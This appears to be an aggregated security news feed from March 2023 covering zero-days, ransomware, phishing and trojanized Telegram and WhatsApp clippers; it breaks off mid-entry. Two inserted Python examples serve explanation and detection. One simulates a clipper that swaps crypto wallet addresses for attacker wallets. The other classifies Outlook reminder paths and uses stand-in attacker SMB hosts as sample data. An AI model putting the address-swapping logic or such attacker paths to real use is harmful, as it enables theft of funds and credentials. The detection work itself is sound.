                Patch Office and Windows now to resolve two zero-days

                exploits
                2023-03-17 https://www.computerworld.com/article/3691010/patch-office-and-windows-now-to-resolve-two-zero-days.html#tk.rss_security

                Microsoft has resolved 80 new CVEs this month in addition to four earlier CVEs, bringing the number of security issues addressed in this month's Patch Tuesday release to 84. 

                Unfortunately, we have two zero-day flaws in Outlook (CVE-2023-23397) and Windows (CVE-2023-24880) that require a "Patch Now" release requirement for both Windows and Microsoft Office updates. As it was last month, there were no further updates for Microsoft Exchange Server or Adobe Reader. This month the team at Application Readiness has provided a helpful infographic that outlines the risks associated with each of the updates for this cycle.

                "

                Autosummary: Windows lifecycle update This section contains important changes to servicing (and most security updates) to Windows desktop and server platforms over the next few months: Windows 10 Enterprise (and Education), Version 20H2 and Windows 10 IoT Enterprise, and Windows Version 20H2 will reach an end of servicing date on May 9, 2023. Unfortunately, we have two zero-day flaws in Outlook (CVE-2023-23397) and Windows (CVE-2023-24880) that require a "Patch Now" release requirement for both Windows and Microsoft Office updates. Browsers There were 22 updates for March (none rated critical), with 21 included in the Google release channel and one (CVE-2023-24892) from Microsoft. Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge). Testing guidance Each month, the team at Readiness analyzes the Patch Tuesday updates and provides detailed, actionable testing guidance; that guidance is based on assessing a large application portfolio and a detailed analysis of the Microsoft patches and their potential impact on the Windows platforms and application installations. "


                Hitachi Energy breached by Clop gang through GoAnywhere Zero-Day exploitation

                exploits industry
                2023-03-17 https://securityaffairs.com/143640/data-breach/hitachi-energy-data-breach.html

                Hitachi Energy disclosed a data breach: the Clop ransomware gang stole the company's data by exploiting the recent GoAnywhere zero-day flaw. Hitachi Energy disclosed a data breach after the company was hacked by the Clop ransomware gang, which stole its data by exploiting the recently disclosed zero-day vulnerability in the GoAnywhere MFT (Managed File Transfer). The […]

                The post Hitachi Energy breached by Clop gang through GoAnywhere Zero-Day exploitation appeared first on Security Affairs.

                "

                Autosummary: "


                Banking turmoil opens opportunities for fraud – Week in security with Tony Anscombe

                financial industry
                2023-03-17 https://www.welivesecurity.com/videos/banking-turmoil-opportunities-cybercriminals-week-security-tony-anscombe/

                Scammers are looking to cash in on the chaos that has set in following the startling meltdowns of Silicon Valley Bank and Signature Bank and the crisis at Credit Suisse

                The post Banking turmoil opens opportunities for fraud – Week in security with Tony Anscombe appeared first on WeLiveSecurity

                "

                Autosummary: "


                How two-step phishing attacks evade detection and what you can do about it

                financial
                2023-03-16 https://www.helpnetsecurity.com/2023/03/16/how-two-step-phishing-attacks-evade-detection-video/

                Phishing attacks have become increasingly prevalent and sophisticated, making it more difficult for individuals to protect themselves from these scams. In this Help Net Security video, Ofek Ronen, Software Engineer at Perception Point, discusses two-step phishing attacks, which are not only dangerous but also evasive, making them even more challenging to detect and avoid. Understanding the dangers of two-step phishing attacks and knowing what to look out for is critical in protecting yourself from falling … More

                The post How two-step phishing attacks evade detection and what you can do about it appeared first on Help Net Security.

                "

                Autosummary: "


                What"s Wrong with Manufacturing?

                industry
                2023-03-16 https://thehackernews.com/2023/03/whats-wrong-with-manufacturing.html
                In last year"s edition of the Security Navigator we noted that the Manufacturing Industry appeared to be totally over-represented in our dataset of Cyber Extortion victims. Neither the number of businesses nor their average revenue particularly stood out to explain this. Manufacturing was also the most represented Industry in our CyberSOC dataset – contributing more Incidents than any other "

                Autosummary: We derived three metrics that facilitate somewhat normalized comparisons across the industries in our client base: VOC scanning findings per asset, time to patch, and Pentest findings per day of testing. In a similar comparison, limited only to Perimeter Security and only to Medium Sized business, Manufacturing ranks 1st with the most Incidents per Customer out of 7 comparable Industries. Pentesting findings: we observe that the average CVSS Per Day was 4.81, compared to 3.61 on average for clients in all other sectors in the dataset – 33% higher. We note that 58% of the Incidents this industry deals with are internally caused, 32% were externally caused, and 1% was classified as "Partner" or 3rd parties. Hunting for possible explanations: Manufacturing is still the most impacted industry in our Cyber Extortion dataset in 2023, as tracked by monitoring double-extortion leak sites. "


                Multiple Hacker Groups Exploit 3-Year-Old Vulnerability to Breach U.S. Federal Agency

                exploits
                2023-03-16 https://thehackernews.com/2023/03/multiple-hacker-groups-exploit-3-year.html
                Multiple threat actors, including a nation-state group, exploited a critical three-year-old security flaw in Progress Telerik to break into an unnamed federal entity in the U.S. The disclosure comes from a joint advisory issued by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC). "

                Autosummary: CVE-2019-18935, in conjunction with CVE-2017-11317, has also been weaponized by a threat actor tracked as Praying Mantis (aka TG2021) to infiltrate the networks of public and private organizations in the U.S. Last month, CISA also added CVE-2017-11357 – another remote code execution bug affecting Telerik UI – to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. "


                CISA Issues Urgent Warning: Adobe ColdFusion Vulnerability Exploited in the Wild

                exploits
                2023-03-16 https://thehackernews.com/2023/03/cisa-issues-urgent-warning-adobe.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on March 15 added a security vulnerability impacting Adobe ColdFusion to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The critical flaw in question is CVE-2023-26360 (CVSS score: 8.6), which could be exploited by a threat actor to achieve arbitrary code execution. "Adobe ColdFusion "

                Autosummary: "


                Winter Vivern APT hackers use fake antivirus scans to install malware

                exploits
                2023-03-16 https://www.bleepingcomputer.com/news/security/winter-vivern-apt-hackers-use-fake-antivirus-scans-to-install-malware/
                An advanced hacking group named "Winter Vivern" targets European government organizations and telecommunication service providers to conduct espionage. [...] "

                Autosummary: As you can see from the batch files below, the malicious files will pretend to perform an antivirus scan, showing a running percentage of time left, while quietly downloading a malicious payload using PowerShell. "


                Hornetsecurity VM Backup V9 protects users against ransomware threats

                exploits ransomware
                2023-03-16 https://www.helpnetsecurity.com/2023/03/16/hornetsecurity-vm-backup-v9/

                Hornetsecurity launched VM Backup V9 – the newest version of its virtual machine (VM) backup, replication and recovery solution. This latest iteration offers ransomware protection leveraging immutable cloud storage on Wasabi and Amazon S3, with Microsoft Azure soon to follow. This new key feature enables customers to protect their backup data from ransomware by making their data tamper-proof for a defined period. A recent Hornetsecurity study revealed that 15% of ransomware attacks specifically targeted backups, … More

                The post Hornetsecurity VM Backup V9 protects users against ransomware threats appeared first on Help Net Security.

                "

                Autosummary: Easy installation and newly overhauled backup repository: VM Backup V9 has an easy-to-use, intuitive interface that gives individuals full control, allowing them to monitor and manage all Hyper-V and VMware VMs from a single console. "


                Multiple threat actors exploited Progress Telerik bug to breach U.S. federal agency

                exploits
                2023-03-16 https://securityaffairs.com/143557/hacking/progress-telerik-bug-attacks.html

                Multiple threat actors exploited a critical flaw in Progress Telerik to breach an unnamed US federal agency, said the US government. A joint advisory issued by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC) revealed that multiple threat actors, including a nation-state actor, exploited a […]

                The post Multiple threat actors exploited Progress Telerik bug to breach U.S. federal agency appeared first on Security Affairs.

                "

                Autosummary: A joint advisory issued by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC) revealed that multiple threat actors, including a nation-state actor, exploited a critical vulnerability in Progress Telerik to breach an unnamed US federal agency. "


                CISA adds Adobe ColdFusion bug to Known Exploited Vulnerabilities Catalog

                exploits
                2023-03-16 https://securityaffairs.com/143553/security/adobe-coldfusion-known-exploited-vulnerabilities-catalog.html

                US CISA added an actively exploited vulnerability in Adobe ColdFusion to its Known Exploited Vulnerabilities Catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in Adobe ColdFusion, tracked as CVE-2023-26360 (CVSS score: 8.6), to its Known Exploited Vulnerabilities Catalog. This week Adobe released security updates for ColdFusion versions 2021 and 2018 to resolve the critical flaw […]

                The post CISA adds Adobe ColdFusion bug to Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

                Autosummary: "


                UK ministers banned from using Chinese app TikTok on government phones

                government
                2023-03-16 https://www.bbc.co.uk/news/uk-politics-64975672?at_medium=RSS&at_campaign=KARANGA
                The social media firm has strongly denied passing users' information to the Chinese government. "

                Autosummary: "


                Convincing Twitter "quote tweet" phone scam targets bank customers

                financial
                2023-03-16 https://www.bleepingcomputer.com/news/security/convincing-twitter-quote-tweet-phone-scam-targets-bank-customers/
                A convincing Twitter scam is targeting bank customers by abusing the quote-tweet feature, as observed by BleepingComputer. The scam preys on customers tweeting to their banks—such as to raise a complaint. But these customers instead receive a reply from the scammer, via a quote-tweet, urging them to call the scammer's "helpline." [...] "

                Autosummary: Earlier this week, I had tagged Axis Bank, India's third-largest private bank, in a tweet but interestingly received a reply as a "quote tweet" from an account claiming to be Axis Bank: Reply to my tweet from a dubious @AXIS_BANK_00 Twitter account (BleepingComputer) Although the lack of any following on the @AXIS_BANK_00 account (and, not to mention, the verification badge) did raise red flags, it wouldn't be the first time a company replies from a separate Twitter account as opposed to their verified one, for example, to minimize amplifying complaints from their customers sent as Tweets. "


                Chinese and Russian Hackers Using SILKLOADER Malware to Evade Detection

                exploits rusia-ucrania
                2023-03-16 https://thehackernews.com/2023/03/chinese-and-russian-hackers-using.html
                Threat activity clusters affiliated with the Chinese and Russian cybercriminal ecosystems have been observed using a new piece of malware that's designed to load Cobalt Strike onto infected machines. Dubbed SILKLOADER by Finnish cybersecurity company WithSecure, the malware leverages DLL side-loading techniques to deliver commercial adversary simulation software. The development comes as "

                Autosummary: BAILLOADER, for its part, is said to exhibit similarities with a crypter codenamed Tron that has been put to use by different adversaries to distribute Emotet, TrickBot, BazarLoader, IcedID, Conti ransomware, and Cobalt Strike. "


                Not‑so‑private messaging: Trojanized WhatsApp and Telegram apps go after cryptocurrency wallets

                exploits
                2023-03-16 https://www.welivesecurity.com/2023/03/16/not-so-private-messaging-trojanized-whatsapp-telegram-cryptocurrency-wallets/

                ESET researchers analyzed Android and Windows clippers that can tamper with instant messages and use OCR to steal cryptocurrency funds

                The post Not‑so‑private messaging: Trojanized WhatsApp and Telegram apps go after cryptocurrency wallets appeared first on WeLiveSecurity

                "

                Autosummary: In select cases we have seen the list of keywords expanded to eleven entries, specifically 助记词, Mnemonic, memorizing, Memorizing, recovery phrase, Recovery Phrase, wallet, METAMASKA, Phrase, secret, Recovery phrase. Cluster 4: The last identified cluster of Android clippers, Cluster 4, can not only replace cryptocurrency addresses, but also exfiltrate the victim’s Telegram data by obtaining their configuration files, phone number, device information, pictures, Telegram username, and the list of installed apps. Instead, they contain several modules with a wide range of functionalities, allowing the threat actors to perform actions such as stealing clipboard data, logging keystrokes, querying Windows Registry, capturing the screen, obtaining system information, and performing file operations. However, unlike the Android version, the victims will not be able to discover that their messages have been tampered with without comparing chat histories: even after restarting the app, the sender will always see the original version of the message since the relevant part of the code is executed again on application start; the recipient, on the other hand, will only receive the attacker wallet. While its source code certainly differs from the rest of the trojans discovered, its functionality is basically identical: it is capable of performing file operations, obtaining system information and the list of running programs, deleting profiles of commonly used browsers, downloading and running a potentially malicious file, and so on. Cluster 3: This cluster monitors Telegram communication for particular keywords in Chinese, such as “mnemonic”, “bank”, “address”, “account” and “Yuan”. Cluster 2: In contrast with Cluster 1, which employs advanced methods to aid in its malicious activities, the second cluster of Android clippers is the least complicated among the four: these malicious apps simply swap wallet addresses, without further malicious functionality. Once a Cluster 3 clipper recognizes a keyword, the whole message, along with the username, group or channel name, is sent to the C&C server, as can be seen in Figure 13. Do not store unencrypted pictures or screenshots containing sensitive information, such as mnemonic phrases, passwords, and private keys, on your device. Logging into these malicious versions of the Telegram app means that all the personal internal data stored within, such as messages, contacts, and configuration files, become visible to the threat actors. Similar to the first Windows clipper sample, any message sent using this malicious version of Telegram containing bitcoin, Ethereum, or TRON cryptocurrency wallet addresses will be modified to replace the addresses for those provided by the attacker (see Figure 16). However, it is possible that with Telegram, WhatsApp, and the Google Play app all being blocked in China, Android users there are used to jumping through several hoops if they want to obtain officially unavailable apps. Android trojans: The main purpose of the trojanized Android apps is to intercept victims’ chat messages, and either swap any cryptocurrency wallet addresses for those belonging to the attackers, or exfiltrate sensitive information that would allow attackers to steal victims’ cryptocurrency funds. On the other hand, WhatsApp’s source code is not publicly available, which means that before repackaging the application with malicious code, the threat actors first had to perform an in-depth analysis of the app’s functionality to identify the specific places to be modified. Since Telegram is an open-source application, the cybercriminals only had to insert their own malicious code into an existing version and compile it; in the case of WhatsApp, however, the binary had to be modified directly and repackaged to add the malicious functionality. Regarding the Windows malware, there was a cluster of Telegram cryptocurrency clippers whose members simply intercept and modify Telegram messages in order to switch cryptocurrency wallet addresses, just like the second cluster of Android clippers. In the case of the attacks described in this blogpost, the threat actors first set up Google Ads leading to fraudulent YouTube channels, which then redirect the unfortunate viewers to copycat Telegram and WhatsApp websites, as illustrated in Figure 1. While the fake websites offer download links for all operating systems where Telegram and WhatsApp are available, all Linux and macOS links, as well as most iOS links, redirect to the services’ official websites. The trojans in Cluster 2 mostly replace addresses for bitcoin, Ethereum, and TRON coin wallets, with a few of them also being able to switch wallets for Monero and Binance. The threat actors purchased Google Ads (see Figure 3) that redirect to YouTube, which both helps the attackers to get to the top of search results, and also avoids getting their fake websites flagged as scams, since the ads link to a legitimate service that Google Ads presumably considers very trustworthy. Windows trojans: As opposed to the trojanized Android apps we discovered, the Windows versions consist not only of clippers, but also of remote access trojans. "
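                The clipper behaviour the ESET summary describes (rewrite every bitcoin, Ethereum or TRON address in a message to the attacker's wallet; on Windows the victim can only notice by comparing the sender's and recipient's chat histories) as an added Python example. This is not ESET's code and nothing here is recovered from the samples: the address patterns are syntactic only (no checksum validation), and every wallet address below is a constructed test value, not attacker infrastructure. The `swapped_addresses` check is the defender's side of the same logic, comparing the two copies of a message.

```python
import re
from itertools import zip_longest
from typing import Dict, List, Optional, Tuple

# Syntactic patterns for the coin families named in the ESET write-up.
# They match the shape of an address only; no checksum validation is done.
ADDRESS_PATTERNS: List[Tuple[str, re.Pattern]] = [
    ("bitcoin", re.compile(r"\b[13][1-9A-HJ-NP-Za-km-z]{25,34}\b")),  # legacy P2PKH / P2SH
    ("bitcoin", re.compile(r"\bbc1[02-9ac-hj-np-z]{25,59}\b")),       # bech32 / bech32m
    ("ethereum", re.compile(r"\b0x[0-9a-fA-F]{40}\b")),
    ("tron", re.compile(r"\bT[1-9A-HJ-NP-Za-km-z]{33}\b")),
]


def find_addresses(text: str) -> List[Tuple[str, str]]:
    """Return (coin, address) pairs in order of appearance in the text."""
    hits = []
    for coin, pattern in ADDRESS_PATTERNS:
        for m in pattern.finditer(text):
            hits.append((m.start(), coin, m.group(0)))
    hits.sort()
    return [(coin, addr) for _, coin, addr in hits]


def clip(message: str, attacker_wallets: Dict[str, str]) -> str:
    """Simulate the clipper: every recognised address is rewritten to the
    attacker's wallet for that coin. Coins without an attacker wallet are left alone."""
    def replace_with_attacker(coin: str):
        return lambda m: attacker_wallets.get(coin, m.group(0))

    out = message
    for coin, pattern in ADDRESS_PATTERNS:
        out = pattern.sub(replace_with_attacker(coin), out)
    return out


def swapped_addresses(sender_copy: str, recipient_copy: str) -> List[Tuple[Optional[str], Optional[str], Optional[str]]]:
    """Compare what the sender still sees with what the recipient received.
    Returns (coin, original, delivered) for each address that differs; None on
    either side means an address was added or dropped in transit."""
    original = find_addresses(sender_copy)
    delivered = find_addresses(recipient_copy)
    diffs = []
    for a, b in zip_longest(original, delivered):
        coin_a, addr_a = a if a else (None, None)
        coin_b, addr_b = b if b else (None, None)
        if addr_a != addr_b:
            diffs.append((coin_a or coin_b, addr_a, addr_b))
    return diffs


# Constructed sample data: none of these are real wallets or attacker infrastructure.
ATTACKER_WALLETS = {
    "bitcoin": "bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4",
    "ethereum": "0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef",
    "tron": "T9yAkVYZyWqHRnUKFkrF6hLAsBxcm6bxFg",
}

SENT = (
    "Send 0.5 BTC to bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq, "
    "2 ETH to 0x52908400098527886E0F7030069857D2E4169EE7 "
    "and 100 TRX to TLa2f6VPqDgRE67v1736s7bJ8Ray5wYjU7"
)

if __name__ == "__main__":
    received = clip(SENT, ATTACKER_WALLETS)
    for coin, original, delivered in swapped_addresses(SENT, received):
        print(f"{coin}: {original} -> {delivered}")
```

                Because the clipper rewrites the message after the sender's client has stored it, `swapped_addresses(sender_copy, recipient_copy)` is exactly the chat-history comparison the ESET text says is the only way a Windows victim can detect the tampering; the same function would flag an address dropped or added in transit.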


                Polish intelligence dismantled a network of Russian spies

                rusia-ucrania
                2023-03-16 https://securityaffairs.com/143564/intelligence/polish-intelligence-russian-spies.html

                Polish intelligence dismantled a cell of Russian spies that gathered info on military equipment deliveries to Ukraine via the EU member. Polish counter-intelligence has dismantled a cell of Russian spies that gathered information on the provisioning of military equipment to Ukraine via the EU member. “The ABW counter-intelligence agency has arrested nine people suspected of […]

                The post Polish intelligence dismantled a network of Russian spies appeared first on Security Affairs.

                "

                Autosummary: "


                Google finds 18 zero-day vulnerabilities in Samsung Exynos chipsets

                exploits
                2023-03-16 https://www.bleepingcomputer.com/news/security/google-finds-18-zero-day-vulnerabilities-in-samsung-exynos-chipsets/
                Project Zero, Google's zero-day bug-hunting team, discovered and reported 18 zero-day vulnerabilities in Samsung's Exynos chipsets used in mobile devices, wearables, and cars. [...] "

                Autosummary: Based on the list of affected chipsets provided by Samsung, the list of affected devices includes but is likely not limited to: Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21, A13, A12 and A04 series; Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series; The Pixel 6 and Pixel 7 series of devices from Google; any wearables that use the Exynos W920 chipset; and any vehicles that use the Exynos Auto T5123 chipset. "


                FakeCalls Android malware returns with new ways to hide on phones

                exploits
                2023-03-16 https://www.bleepingcomputer.com/news/security/fakecalls-android-malware-returns-with-new-ways-to-hide-on-phones/
                Android malware "FakeCalls" is circulating again in South Korea, imitating phone calls for over 20 financial organizations and attempting to fool targets into giving away their credit card details. [...] "

                Autosummary: [Figure: Files in the APK asset folder (CheckPoint)] A costly problem: According to South Korean government stats, vishing (voice phishing) is a problem that has cost victims in the country $600 million in 2020 alone, while there have been 170,000 reported victims between 2016 and 2020. "


                Fortinet zero-day attacks linked to suspected Chinese hackers

                exploits
                2023-03-16 https://www.bleepingcomputer.com/news/security/fortinet-zero-day-attacks-linked-to-suspected-chinese-hackers/
                A suspected Chinese hacking group has been linked to a series of attacks on government organizations exploiting a Fortinet zero-day vulnerability (CVE-2022-41328) to deploy malware. [...] "

                Autosummary: While jointly investigating the incident with Fortinet, Mandiant found that, after breaching the Fortinet devices, UNC3886 backdoored them using two new malware strains for continued access to the victims' networks: a Python-based Thincrust backdoor and the ICMP port-knocking Castletap passive backdoor. "


                Adobe Acrobat Sign abused to push Redline info-stealing malware

                exploits
                2023-03-16 https://www.bleepingcomputer.com/news/security/adobe-acrobat-sign-abused-to-push-redline-info-stealing-malware/
                Cybercriminals are abusing Adobe Acrobat Sign, an online document signing service, to distribute info-stealing malware to unsuspecting users. [...] "

                Autosummary: Abusing legitimate services Adobe Acrobat Sign is a free-to-try cloud-based e-signature service allowing users to send, sign, track, and manage electronic signatures. "


                Conti-based ransomware ‘MeowCorp’ gets free decryptor

                exploits ransomware
                2023-03-16 https://www.bleepingcomputer.com/news/security/conti-based-ransomware-meowcorp-gets-free-decryptor/
                A decryption tool for a modified version of the Conti ransomware could help hundreds of victims recover their files for free. [...] "

                Autosummary: According to Kaspersky, the decryptor can recover files encrypted by the modified Conti variant that used the following name pattern and extensions: <file_name>.KREMLIN, <file_name>.RUSSIA, <file_name>.PUTIN. Conti ransomware's demise: For about three years, the Conti gang ran one of the most active and lucrative ransomware-as-a-service operations, targeting big organizations and demanding large ransoms to decrypt the data they locked. "


                Latitude cyberattack leads to data theft at two service providers

                ciber Telcos
                2023-03-16 https://www.bleepingcomputer.com/news/security/latitude-cyberattack-leads-to-data-theft-at-two-service-providers/
                Latitude Financial Services (Latitude) has published a notice on its website today informing customers that it has suffered a ransomware attack that resulted in the theft of some customer data. [...] "

                Autosummary: "


                Microsoft sheds light on a year of Russian hybrid warfare in Ukraine

                rusia-ucrania
                2023-03-16 https://securityaffairs.com/143570/cyber-warfare-2/russian-hybrid-warfare-ukraine.html

                Russia-linked threat actors targeted at least 17 European nations in 2023, and 74 countries since the start of the invasion of Ukraine. Microsoft revealed that Russia-linked threat actors targeted at least 17 European nations between January and mid-February 2023. According to a report published by the IT giant, the state-sponsored hackers have targeted 74 countries […]

                The post Microsoft sheds light on a year of Russian hybrid warfare in Ukraine appeared first on Security Affairs.

                "

                Autosummary: "


                BianLian ransomware gang shifts focus to pure data extortion

                exploits ransomware
                2023-03-16 https://www.bleepingcomputer.com/news/security/bianlian-ransomware-gang-shifts-focus-to-pure-data-extortion/
                The BianLian ransomware group has shifted its focus from encrypting its victims' files to only exfiltrating data found on compromised networks and using them for extortion. [...] "

                Autosummary: Extortion without encryption: Encrypting files, data theft, and threatening to leak stolen files is known as a "double extortion" tactic, which serves as an additional form of coercion for ransomware gangs looking to increase pressure on their victims. "


                Ransomware attack hits ANOTHER school

                exploits
                2023-03-16 https://www.malwarebytes.com/blog/news/2023/03/ransomware-attack-hits-another-school

                Categories: News, Ransomware

                Tags: Wymondham College, ransomware attack, ransomware, Vice Society, National Cyber Security Centre, NCSC

                Wymondham College is operating as normal, with a few expected disruptions that may be minimal but lasting.

                (Read more...)

                The post Ransomware attack hits ANOTHER school appeared first on Malwarebytes Labs.

                "

                Autosummary: Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. The school didn't provide additional information, but Jonathan Taylor, chief of the school's parent company Sapientia Education Trust, has revealed the school is yet to receive a ransom note. "


                Canonical collaborates with MediaTek to optimize Ubuntu for IoT innovations

                industry
                2023-03-15 https://www.helpnetsecurity.com/2023/03/15/canonical-mediatek/

                Canonical is partnering with MediaTek to meet the growing demands of the IoT industry, reduce development costs and accelerate time-to-market. By partnering to enable Ubuntu on the Genio platform, MediaTek and Canonical will make it easier for developers, innovators and the embedded community to take advantage of this power-efficient, high-performance IoT SoC. The collaboration ensures developers and enterprises can create reliable and secure devices, benefiting from up to 10 years of enterprise-grade Ubuntu support, security … More

                The post Canonical collaborates with MediaTek to optimize Ubuntu for IoT innovations appeared first on Help Net Security.

                "

                Autosummary: Aiming to further the deployment of Arm-based solutions, Ubuntu Core, the secure, application-centric OS optimised for embedded devices, is now available on SystemReady-certified arm64 systems, with the MediaTek Genio 1200 becoming the first platform to enable Ubuntu Core on SystemReady IR. Reliable and efficient over-the-air updates: With the modern proliferation of IoT devices, delivering reliable software updates to low-powered, inaccessible, and often remotely administered embedded systems is significantly challenging. "


                Exfiltration malware takes center stage in cybersecurity concerns

                exploits ciber
                2023-03-15 https://www.helpnetsecurity.com/2023/03/15/malware-exfiltrate-data/

                While massive public data breaches rightfully raise alarms, the spike in malware designed to exfiltrate data directly from devices and browsers is a key contributor to continued user exposure, according to SpyCloud. The 2023 report identified over 22 million unique devices infected by malware last year. Of the 721.5 million exposed credentials recovered by SpyCloud, roughly 50% came from botnets, tools commonly used to deploy highly accurate information-stealing malware. These infostealers enable cybercriminals to work … More

                The post Exfiltration malware takes center stage in cybersecurity concerns appeared first on Help Net Security.

                "

                Autosummary: Cybercriminals can easily access critical business applications: Cybercriminals have doubled down and exploited the economic downturn, growing hybrid workforce, ghost accounts from terminated employees, and increased outsourcing, which elevates third-party exposure. "


                Top 50 most impersonated brands by phishing URLs

                financial
                2023-03-15 https://www.helpnetsecurity.com/2023/03/15/impersonated-brands-by-phishing-urls/

                Today, phishing is the fastest growing Internet crime, and a threat to both consumers and businesses. Finance, technology, and telecom brands were the most commonly impersonated industries, notably for the unprecedented access and financial benefit that bank accounts, email and social media, and phone companies can give attackers, according to Cloudflare. The challenge of phishing URLs By masquerading as a reputable source – sometimes with an enticing request, other times with a severe consequence – … More

                The post Top 50 most impersonated brands by phishing URLs appeared first on Help Net Security.

                "

                Autosummary: "


                Argentina inflation soars past 100% mark

                latam
                2023-03-15 https://www.bbc.co.uk/news/world-latin-america-64960385?at_medium=RSS&at_campaign=KARANGA
                Inflation hits triple digits for the first time since the period of hyperinflation in the early 1990s. "

                Autosummary: "


                How Mirel Sehic relies on simplicity to focus on product security

                government
                2023-03-15 https://www.helpnetsecurity.com/2023/03/15/mirel-sehic-product-security/

                If you are developing a modern medical, manufacturing, or logistics facility, there’s no doubt that a large portion of your investment was made into the electronic aspects of your device. Sensors, connected devices, and machinery are synchronized to deliver a streamlined experience. For facility operators, this includes elevators, HVAC systems, PLC controls, valves, pumps, and a whole slew of systems that we don’t think of as ‘connected.’ And that’s precisely the problem. Many of the … More

                The post How Mirel Sehic relies on simplicity to focus on product security appeared first on Help Net Security.

                "

                Autosummary: For facility operators, this includes elevators, HVAC systems, PLC controls, valves, pumps, and a whole slew of systems that we don’t think of as ‘connected.’ Studying engineering, mechanics, and robotics, Mirel Sehic cut his teeth on process control environments and PLCs to control valves and pumps in manufacturing sites, oil rigs, and other places. Homes, airports, federal buildings, academic institutions, warehouses, and others all have unique challenges that must be addressed. Now, if it’s a standard premium commercial building, you may say, ‘okay, I need to fix that right away’. How SBOMs can help in the coming years: While the concept of a software ‘ingredient list’, known as a Software Bill of Materials (SBOM), has been around for some time, we are only recently starting to see it become required by regulatory and oversight bodies. Requests for SBOMs are only going to increase since, if we think about it, “the huge majority of the applications we use today contain some element of open source code,” said Sehic. "


                Security Firm Rubrik breached by Clop gang through GoAnywhere Zero-Day exploitation

                exploits
                2023-03-15 https://securityaffairs.com/143512/cyber-crime/rubrik-breached-goanywhere-zero-day-exploitation.html

                Data security firm Rubrik discloses a data breach; attackers exploited a recent GoAnywhere zero-day to steal its data. Cybersecurity firm Rubrik disclosed a data breach: a ransomware group stole company data by exploiting the recently disclosed zero-day vulnerability in the Fortra GoAnywhere secure file transfer platform. The company was the victim of a large-scale campaign targeting […]

                The post Security Firm Rubrik breached by Clop gang through GoAnywhere Zero-Day exploitation appeared first on Security Affairs.

                "

                Autosummary: "


                Critical Microsoft Outlook bug PoC shows how easy it is to exploit

                exploits
                2023-03-15 https://www.bleepingcomputer.com/news/security/critical-microsoft-outlook-bug-poc-shows-how-easy-it-is-to-exploit/
                Security researchers have shared technical details for exploiting a critical Microsoft Outlook vulnerability for Windows (CVE-2023-23397) that allows hackers to remotely steal hashed passwords by simply receiving an email. [...] "

                Autosummary: “The connection to the remote SMB server sends the user’s NTLM negotiation message, which the attacker can then relay for authentication against other systems that support NTLM authentication” - Microsoft However, exploiting the issue requires more technical details, which came shortly after Microsoft released the fix from researchers at security consulting company MDSec. "
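                The mechanism quoted above (Outlook connects to an attacker-named SMB server and sends the user's NTLM negotiation message, with no user interaction) comes down to one question a responder has to answer for every mailbox item that carries a reminder sound path: is it a local file, a UNC path to a server inside the estate, or a UNC path to something outside? The classifier below is an added Python example, not code from MDSec, Microsoft or BleepingComputer. It assumes the property values have already been exported as strings (how they are pulled from Exchange is outside this snippet), and the trusted DNS suffix and sample values are constructed.

```python
import ipaddress
import re
from typing import Iterable, List, Optional, Set, Tuple

# \\host\share... or //host/share...; the host is everything up to the next separator.
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)(?:[\\/]|$)")


def unc_host(path: str) -> Optional[str]:
    """Return the server a UNC path points at, or None for a local/relative path.
    WebDAV forms such as host@80 or host@SSL@443 are reduced to the bare host."""
    m = UNC_RE.match(path.strip())
    if not m:
        return None
    return m.group(1).split("@", 1)[0].lower().rstrip(".")


def is_internal_host(host: str, trusted_suffixes: Set[str]) -> bool:
    """True for private/loopback/link-local IPs and for names under a trusted DNS suffix."""
    try:
        ip = ipaddress.ip_address(host)
        return ip.is_private or ip.is_loopback or ip.is_link_local
    except ValueError:
        pass  # not an IP literal; fall through to the name check
    return any(host == s or host.endswith("." + s) for s in trusted_suffixes)


def classify_reminder_path(value: str, trusted_suffixes: Set[str]) -> str:
    """'local': no SMB connection implied.
    'internal-unc': Outlook would authenticate to a host we already trust.
    'external-unc': NTLM would be sent to a server outside the estate (the CVE-2023-23397 case)."""
    host = unc_host(value)
    if host is None:
        return "local"
    return "internal-unc" if is_internal_host(host, trusted_suffixes) else "external-unc"


def triage(values: Iterable[str], trusted_suffixes: Set[str]) -> List[Tuple[str, str]]:
    """Return (verdict, value) for every reminder-sound value, worst verdict first."""
    order = {"external-unc": 0, "internal-unc": 1, "local": 2}
    rows = [(classify_reminder_path(v, trusted_suffixes), v) for v in values]
    return sorted(rows, key=lambda r: order[r[0]])


# Constructed sample property values; not taken from any real mailbox.
TRUSTED_SUFFIXES = {"corp.example"}
SAMPLE_REMINDER_VALUES = [
    r"C:\Windows\Media\Alarm01.wav",
    r"\\files.corp.example\media\reminder.wav",
    r"\\10.0.0.5\share\reminder.wav",
    r"\\attacker.example.net\share\anything.wav",
    r"\\attacker.example.net@80\DavWWWRoot\x.wav",
]

if __name__ == "__main__":
    for verdict, value in triage(SAMPLE_REMINDER_VALUES, TRUSTED_SUFFIXES):
        print(f"{verdict:13} {value}")
```

                The `@80` / `@SSL@443` handling matters because Windows falls back to WebDAV when SMB is blocked, so a perimeter rule for TCP 445 alone does not make an external UNC path safe; the path check is a detection, the fix is the patch. Microsoft's advisory also recommends blocking outbound 445 and adding high-value accounts to the Protected Users group, which stops those accounts from using NTLM at all.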


                US federal agency hacked using old Telerik bug to steal data

                exploits
